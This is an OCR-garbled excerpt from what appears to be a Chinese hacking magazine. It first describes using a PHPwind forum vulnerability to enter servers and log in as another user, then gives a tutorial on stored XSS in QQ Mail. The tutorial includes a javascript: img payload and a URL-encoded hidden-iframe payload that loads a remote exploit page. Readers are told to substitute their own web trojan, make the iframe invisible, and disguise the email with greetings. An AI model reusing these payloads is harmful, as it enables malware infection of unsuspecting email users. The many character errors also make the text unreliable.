如发现有乱码， 请直接从这里浏览原文
正文摘录:

务器前!就这样，我不停地踢出来，再进去，但始终快不过管理员，后来对方居然荚机了!本来还想参观一下服务器的，管理次既然不给面子也就算了吧。后来我又试了一F我经常去的。邪恶八进制”论坛，当然也成功了，使片j“冰血封情”老人的ID成功髓录进了论坛，如图l0。这个漏洞可真是玩得爽呀!四，漏洞修补更改了“冰JlfL封情”的密码后当然耍通知他喽，要不然我可就成千古罪人了!后来又通知了PHPwind宙方，官方不久Jlj就发fiir补J‘程序。埘于还没有修补此漏洞的站长可以到下ll百i的地址下载型新补丁。5.0.1版补丁F载地址：http：／／www.phpwind.com／5.0／safcrepair.zip、5.3板补rF戟地址：http：／／www.phpwind.COin／5.3／safercljair.zip。漏洞的利川就是这么简单，至1：漏洞的形成原因我就不清楚了，反正菜吗f『】也对那个没什么兴趣。如果大家对于该漏洞还-彳『什么蜓好的玩法，也请一起分享一F哟!(文章中涉及到的PHPwind漏洞利用工具已经收录在光盘中)瞄.QQ邮箱我再来跨这JL天有几个新手群里总是讨论如何进入别人的个人电脑的问题，由于日前很多糸统部封堵了。一些漏洞，感觉针对个人电脑的入侵甚至要比入侵服务器还更困难一些，我认为使用社会工程学来的更快捷有效一砦。再由-『QQ在国内的用户群很夫，找自然就联想到QQ邮箱挂马了，不管jj七：卜～，先跨r再说，先来个：＜IMGSRc=j8vasGript：aIert(’xss’)＞测试图1没想到如此顺利.看来又足没有被过滤，如图2。剩下的事儿就简单了，直接写信升”切换到彩色图文”，如图3。接着编辑html源码，如罔4。安静的小E直接输入我们的扯tfJf℃¨(龟r“＜”，“＞”等‘一符想部不用想，肯定足会被过滤的)：＜imgsrc=j8v8scriPt：window.documertt.write(’％3CIframe％20src％3Dhttp％3A／／exPloit.phpnet.us／index.htm％20width％3D500％20height％3D550％3E％3c／iframe％3E’)＞，如网5。图5这里需要把特殊字符转换成1。六进制：“＜”对应“％3C”，“空格”对应“％20”，“，”对应“％3D”，“：”对应“％3A”，“＞”对应“％3E”。我足以我的BLOG页面做的测试，在实际运用叶1把网址换成你的网页木马，把width宽和height高的值换成0即可，然后写一写祝福的语占等等，我们就把信发送出去吧!看一图6如果换成了有效的刚屿，进入别人的个人电脑还足问题吗?墨